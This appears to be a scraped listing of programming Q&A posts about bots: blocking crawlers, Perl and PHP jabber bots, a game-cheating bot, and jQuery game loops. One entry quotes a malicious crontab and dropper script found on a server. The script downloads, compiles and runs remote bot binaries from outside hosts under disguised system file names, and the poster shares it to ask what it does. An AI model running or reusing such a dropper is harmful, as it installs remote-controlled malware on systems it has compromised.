  • Prevent bot from crawling certain areas of site.

    - by Skoder
Hey, I don't know much about SEO and how web spiders work, so forgive my ignorance here. I'm creating a site (using ASP.NET-MVC) which has areas that displays information retrieved from the database. The data is unique to the user, so there's no real server-side output caching going on. However, since the data can contain things the user may not wish to have displayed from search engine results, I'd like to prevent any spiders from accessing the search results page. Are there any special actions I should take to ensure that the search result directory isn't crawled? Also, would a spider even crawl a page that's dynamically generated and would any actions preventing certain directories being search mess up my search engine rankings? edit: I should add, I'm reading up on robots.txt protocol, but it relies on co-operation from the web crawler. However, I'd also like to prevent any data-mining users who will ignore the robots.txt file. I appreciate any help!

  • How do the XMPP modules work in perl?

    - by TheGNUGuy
Hey everybody, I am trying to make my own jabber bot but i have run into a little trouble. I have gotten my bot to respond to messages, however, if I try to change the bot's presence then it seems as though all of the messages you send to the bot get delayed. What I mean is when I run the script I change the presence so I can see that it is online. Then When I send it a message it takes 3 before the callback subroutine i have set up for messages gets called. After the 3rd message is sent and the chat subroutine is called it still process the first message I sent. This really doesn't pose TOO much of a problem except that I have it set up to log out when I send the message "logout" and it has to be followed by two more messages in order to log out. I am not sure what it is that I have to do to fix this but i think it has something to do with iq packets because I have an iq callback set as well and it gets called 2 times after setting the presence. Here is my source code: http://pastebin.com/MgKMhTML Thanks for your help!

  • How can I make my Perl Jabber bot an event-driven program?

    - by TheGNUGuy
I'm trying to make a Jabber bot and I am having trouble keeping it running while waiting for messages. How do I get my script to continuously run? I have tried calling a subroutine that has a while loop that I, in theory, have set up to check for any messages and react accordingly but my script isn't behaving that way. Here is my source: http://pastebin.com/03Habbvh # set jabber bot callbacks $jabberBot-SetMessageCallBacks(chat=\&chat); $jabberBot-SetPresenceCallBacks(available=\&welcome,unavailable=\&killBot); $jabberBot-SetCallBacks(receive=\&prnt,iq=\&gotIQ); $jabberBot-PresenceSend(type="available"); $jabberBot-Process(1); sub welcome { print "Welcome!\n"; $jabberBot-MessageSend(to=$jbrBoss-GetJID(),subject="",body="Hello There!",type="chat",priority=10); &keepItGoing; } sub prnt { print $_[1]."\n"; } #$jabberBot-MessageSend(to=$jbrBoss-GetJID(),subject="",body="Hello There! • keeping xmphp bot always online

    - by Gunjan
I created a simple xmpp bot in PHP which connects to google talk server. I basically modified the cli_longrun example. When I run the script in browser the bot comes online and stays online for a while even after I close the tab on which the script was running (as it is just an infinite loop listening for events on the stream). But after a while the bot becomes offline. The question is how do I keep the bot always online. One way I can think of is to run a cron that would disconnect the earlier one and start a new session. But is there a better approch?

  • My perl script is acting funny...

    - by TheGNUGuy
I am trying to make a jabber bot from scratch and my script is acting funny. I was originally developing the bot on a remote CentOS box, but I have switched to a local Win7 machine. Right now I'm using ActiveState Perl and I'm using Eclipse with the perl plugin to run a debug the script. The funny behavior I'm experiencing occurs when I run or debug the script. If I run the script using the debugger it works fine, meaning I can send messages to the bot and it can send messages to me. However when I just execute the script normally the bot sends the successful connection message then it disconnects from my jabber server and the script ends. I'm a novice when it comes to perl and I can't figure out what I'm doing wrong. My guess is it has something to do with the subroutines and sending the presence of the bot. (I know for sure that it has something to do with sending the bot's presence because if the presence code is removed, the script behaves as expected except the bot doesn't appear to be online.) If anyone can help me with this that would be great. I originally had everything in 1 file but separated them into several trying to figure out my problem here are the pastebin links to my source code. jabberBot.pl: http://pastebin.com/cVifv0mm chatRoutine.pm: http://pastebin.com/JXmMT7av trimSpaces.pm: http://pastebin.com/SkeuWtu1 Thanks again for any help!

  • Malicious crawler blocker for ASP.NET

    - by Marek
I have just stumbled upon Bad Behavior - a plugin for PHP that promises to detect spam and malicious crawlers by preventing them from accessing the site at all. Does something similar exist for ASP.NET/ASP.NET MVC? I am interested in blocking access to the site altogether, not in detecting spam after it was posted.

  • Custom Trigger Scripts for Bot (Xcode 5 CI)

    - by Mishal Shah
I am working on setting up CI for my iOS application and I am facing some issues. Where is a good place to find documents on Bot? I have seen the Xcode help but cant find any good example, also watched the CI video from 2013 conference How do i create a custom trigger script, so every time a developer commits their code it will automatically trigger the bot. How do I merge the code to master only if Test successfully passes the bot? Here is where I found info about trigger scripts https://help.apple.com/xcode/mac/1.0/#apdE6540C63-ADB5-4B07-89B7-6223EC40B59C Example values are shown with each setting. Schedule: Choose to run manually, periodically, on new commits, or on trigger scripts. Thank you!

  • C++ AI Design Question

    - by disney
Hi, I am currently writing a bot for a MMORPG. Though, currently I am stuck at trying to figure out how to nicely implement this. The design problem is related to casting the character spells in the correct order. Here is a simple example to what I need to archieve. It's not related to casting them, but doing it in the correct order. I would know how simply cast them randomly, by checking which skill has not yet been casted, but in right order as being shown in the GUI, not really. note: the skill amount may differ, it's not always 3, maximum 10 though. Charactername < foobar has 3 skills. Skill 1: Name ( random1 ) cooldown ( 1000 ms ) cast duration ( 500 ms ) Skill 2: Name ( random2 ) cooldown ( 1500 ms ) cast duration ( 700 ms ) Skill 3: Name ( random3 ) cooldown ( 2000 ms ) cast duration ( 900 ms ) I don't really know how I could implement this, if anyone has some thoughts, feel free to share. I do know that most of the people don't like the idea of cheating in games, I don't like it either, nor I am actually playing the game, but its an interesting field for me. Thank you.

  • Example of a RoboCup 3D Soccer bot?

    - by Drew Noakes
I'd like to write a bot to play in the 3D RoboCup simulated soccer league. Can anyone point me at some code that already deals with communication with the server, etc? Ideally this would be .NET code, but an example produced in any language would still be useful. EDIT For anyone who is not familiar with the RoboCup 3D Soccer league, check out this YouTube video. It has some pretty funny moments, if you're into that sort of thing...

  • Detecting suspicious behaviour in a web application - what to look for?

    - by Sosh
I would like to ask the proactive (or paranoid;) among us: What are you looking for, and how? I'm thinking mainly about things that can be watched for programaticaly, rather than manually inspecting logs. For example: - Manual/automated hack attempts - Data skimming - Bot registrations (that have evaded captcha etc.) - Other unwanted behaviour Just wondering what most people would consider practical and effective..

  • Zend_Db_Select: regrouping conditions in where clause

    - by pvledoux
Hi, I would like to do something like this: $select = $myTbl->select() ->from('download_log') ->joinLeft(...... etc........ ->joinLeft(...... etc........ ->joinLeft(...... etc........); //Filter all configured bots (Google, Yahoo, etc.) if(isset($this->_config->statistics->bots)){ $bots = explode(',',$this->_config->statistics->bots); foreach ($bots as $bot){ $select = $select->orWhere("user_agent NOT LIKE '%$bot%'"); } } $select = $select->where("download_log.download_log_ts BETWEEN '".$start_date." 00:00:00' AND '".$end_date." 23:59:59'"); But the outputed query is not correct because of the orWhere clauses are not grouped together in a unique AND clause. I would like to know if it is possible to regrouped those OR clauses in a pair of parentheres. My current alternative is the following: //Filter all configured bots (Google, Yahoo, etc.) if(isset($this->_config->statistics->bots)){ $bots = explode(',',$this->_config->statistics->bots); foreach ($bots as $bot){ $stmt .= "user_agent NOT LIKE '%$bot%' OR "; } $stmt = substr($stmt,0,strlen($stmt)-3); //remove the last OR $select = $select->where("($stmt)"); } Thanks!

  • More efficient comparison of numbers

    - by Pez Cuckow
I have an array which is part of a small JS game I am working on I need to check (as often as reasonable) that each of the elements in the array haven't left the "stage" or "playground", so I can remove them and save the script load I have coded the below and was wondering if anyone knew a faster/more efficient way to calculate this. This is run every 50ms (it deals with the movement). Where bots[i][1] is movement in X and bots[i][2] is movement in Y (mutually exclusive). for (var i in bots) { var left = parseInt($("#" + i).css("left")); var top = parseInt($("#" + i).css("top")); var nextleft = left + bots[i][1]; var nexttop = top + bots[i][2]; if(bots[i][1]>0&&nextleft>=PLAYGROUND_WIDTH) { remove_bot(i); } else if(bots[i][1]<0&&nextleft<=-GRID_SIZE) { remove_bot(i); } else if(bots[i][2]>0&&nexttop>=PLAYGROUND_HEIGHT) { remove_bot(i); } else if(bots[i][2]<0&&nexttop<=-GRID_SIZE) { remove_bot(i); } else { //alert(nextleft + ":" + nexttop); $("#" + i).css("left", ""+(nextleft)+"px"); $("#" + i).css("top", ""+(nexttop)+"px"); } } On a similar note the remove_bot(i); function is as below, is this correct (I can't splice as it changes all the ID's of the elements in the array. function remove_bot(i) { $("#" + i).remove(); bots[i] = false; } Many thanks for any advice given!

  • Increase efficiency of a loop with jQuery

    - by Pez Cuckow
    I have a game coded in jQuery where bots are moved around the screen. The below code is a loop that runs every 20ms, currently if you have over 15 bots you start to notice the browser lagging (simply because of all the advanced collision detection going on). Is there any way to reduce the lag, can I make it any more efficient? P.s. sorrry for just posting a block of code, I can't see a way to make my point clear enough without! $.playground().registerCallback(function(){ //Movement Loop if(!pause) { for (var i in bots) { //bots - color, dir, x, y, z, spawned?, spawnerid, prevd var self = $('#b' + i); var current = bots[i]; if(bots[i][5]==1) { var xspeed = 0, yspeed = 0; if(current[1]==0) { yspeed = -D_SPEED; } else if(current[1]==1) { xspeed = D_SPEED; } else if(current[1]==2) { yspeed = D_SPEED; } else if(current[1]==3) { xspeed = -D_SPEED; } var x = current[2] + xspeed; var y = current[3] + yspeed; var z = current[3] + 120; if(current[2]>0&&x>PLAYGROUND_WIDTH||current[2]<0&&x<-GRID_SIZE|| current[3]>0&&y>PLAYGROUND_HEIGHT||current[3]<0&&y<-GRID_SIZE) { remove_bot(i, self); } else { if(current[7]!=current[1]) { self.setAnimation(colors[current[0]][current[1]]); bots[i][7] = current[1]; } if(self.css({"left": ""+(x)+"px", "top": ""+(y)+"px", "z-index": z})) { bots[i][2] = x; bots[i][3] = y; bots[i][4] = z; bots[i][8]++; } } } } $("#debug").html(dump(arrows)); $(".bot").each(function(){ var b_id = $(this).attr("id").substr(1); var collision = false; var c_bot = bots[b_id]; var b_x = c_bot[2]; var b_y = c_bot[3]; var b_d = c_bot[1]; $(this).collision(".arrow,#arrows").each(function(){ //Many thanks to Selim Arsever for this fix! var a_id = $(this).attr("id").substr(1); var piece = arrows[a_id]; var a_v = piece[0]; if(a_v==1) { var a_x = piece[2]; var a_y = piece[3]; var d_x = b_x-a_x; var d_y = b_y-a_y; if(d_x>=4&&d_x<=5&&d_y>=1&&d_y<=2) { //bots - color, dir, x, y, z, spawned?, spawnerid, prevd bots[b_id][7] = c_bot[1]; bots[b_id][1] = piece[1]; collision = true; } } }); if(!collision) { $(this).collision(".wall,#level").each(function(){ var w_id = $(this).attr("id").substr(1); var piece = pieces[w_id]; var w_x = piece[1]; var w_y = piece[2]; d_x = b_x-w_x; d_y = b_y-w_y; if(b_d==0&&d_x>=4&&d_x<=5&&d_y>=27&&d_y<=28) { kill_bot(b_id); collision = true; } //4 // 33 if(b_d==1&&d_x>=-12&&d_x<=-11&&d_y>=21&&d_y<=22) { kill_bot(b_id); collision = true; } //-14 // 21 if(b_d==2&&d_x>=4&&d_x<=5&&d_y>=-9&&d_y<=-8) { kill_bot(b_id); collision = true; } //4 // -9 if(b_d==3&&d_x>=22&&d_x<=23&&d_y>=20&&d_y<=21) { kill_bot(b_id); collision = true; } //22 // 21 }); } if(!collision&&c_bot[8]>GRID_MOVE) { $(this).collision(".spawn,#level").each(function(){ var s_id = $(this).attr("id").substr(1); var piece = pieces[s_id]; var s_x = piece[1]; var s_y = piece[2]; d_x = b_x-s_x; d_y = b_y-s_y; if(b_d==0&&d_x>=4&&d_x<=5&&d_y>=19&&d_y<=20) { kill_bot(b_id); collision = true; } //4 // 33 if(b_d==1&&d_x>=-14&&d_x<=-13&&d_y>=11&&d_y<=12) { kill_bot(b_id); collision = true; } //-14 // 21 if(b_d==2&&d_x>=4&&d_x<=5&&d_y>=-11&&d_y<=-10) { kill_bot(b_id); collision = true; } //4 // -9 if(b_d==3&&d_x>=22&&d_x<=23&&d_y>=11&&d_y<=12) { kill_bot(b_id); collision = true; } //22 // 21*/ }); } if(!collision) { $(this).collision(".exit,#level").each(function(){ var e_id = $(this).attr("id").substr(1); var piece = pieces[e_id]; var e_x = piece[1]; var e_y = piece[2]; d_x = b_x-e_x; d_y = b_y-e_y; if(d_x>=4&&d_x<=5&&d_y>=1&&d_y<=2) { current_bots++; bots[b_id] = false; $("#current_bots").html(current_bots); $("#b" + b_id).setAnimation(exit[2], function(node){$(node).fadeOut(200)}); } }); } if(!collision) { $(this).collision(".bot,#level").each(function(){ var bd_id = $(this).attr("id").substr(1); if(bd_id!=b_id) { var piece = bots[bd_id]; var bd_x = piece[2]; var bd_y = piece[3]; d_x = b_x-bd_x; d_y = b_y-bd_y; if(d_x>=0&&d_x<=2&&d_y>=0&&d_y<=2) { kill_bot(b_id); kill_bot(bd_id); collision = true; } } }); } }); } }, REFRESH_RATE); Many thanks,

    I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] http://stablehost.us/bots/regular.bot contents are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him. It seems to me this script downloads some remote C source codes and binaries, compile them and execute them. I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server. Can you give me more infos about what this code does? About its working, its purposes?

  • How can I block abusive bots from accessing my Heroku app?

    - by aem
My Heroku (Bamboo) app has been getting a bunch of hits from a scraper identifying itself as GSLFBot. Googling for that name produces various results of people who've concluded that it doesn't respect robots.txt (eg, http://www.0sw.com/archives/96). I'm considering updating my app to have a list of banned user-agents, and serving all requests from those user-agents a 400 or similar and adding GSLFBot to that list. Is that an effective technique, and if not what should I do instead? (As a side note, it seems weird to have an abusive scraper with a distinctive user-agent.)

  • Does google use chrome to check if a link is used by humans or just there for the bots?

    - by sam
Does clicking a link in chrome tell google the link is used by humans and there fore not just automated backlink spam. It sounds weird but i read it today on a slightly obscure seo blog, they mensionned clicking the backlinks they make in a version of chrome where they have the "send data annonmusly to google" feature turned on. It sounded a bit far fetched but then i thought it could have a truth to it as with google now looking harder at "spammy" links it would mean at least some humans are using them. Has any one else heard anything else about this ?
